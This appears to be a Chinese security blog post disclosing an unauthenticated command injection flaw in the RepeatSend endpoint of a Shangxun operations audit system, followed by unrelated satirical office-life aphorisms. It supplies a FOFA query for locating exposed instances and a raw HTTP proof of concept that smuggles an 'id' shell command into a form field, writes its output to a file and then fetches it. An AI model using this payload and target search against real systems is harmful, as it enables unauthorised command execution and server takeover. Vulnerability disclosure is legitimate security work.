上讯信息技术股份有限公司运维管理系统RepeatSend命令执行漏洞

上讯信息技术股份有限公司运维管理系统RepeatSend命令执行漏洞

sec0nd安全 2025-05-18 15:15

字数 335,阅读大约需 2 分钟

漏洞简介

上讯信息运维管理审计系统 repeatsend 远程命令执行,未经身份验证的远程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。

FOFA

body="default/getloginhtml"

POC

POST /emailapply/RepeatSend HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36id='%0id > 123.txt%0a'

GET /123.txt HTTP/1.1Host: 

噢,对了这个漏洞没用到代码审计的技能,只不过是前人栽树后人乘凉罢了。

懂的都懂

鸡汤

  • • 每个Excel单元格都是全景监狱的微型模型

  • • 在KPI炼金术里,灵魂正被批量转化为可交易金属

  • • 茶水间的窃语是福柯笔下的规训回音壁

  • • 周报里的虚假数据正在书写新资本论补遗

  • • 工位隔板构成汉娜·阿伦特式的平庸之恶矩阵

  • • 晋升阶梯的每一阶都浇筑着海德格尔说的”常人”骨灰

  • • 会议室的单向镜后,鲍德里亚的拟像正在直播

  • • 钉钉提示音是数字泰勒主义的弥赛亚召唤

  • • 年终奖数字成为存在主义焦虑的二进制封印

  • • 这场永续的办公室政治,本质是资本精心设计的斗兽场 placebo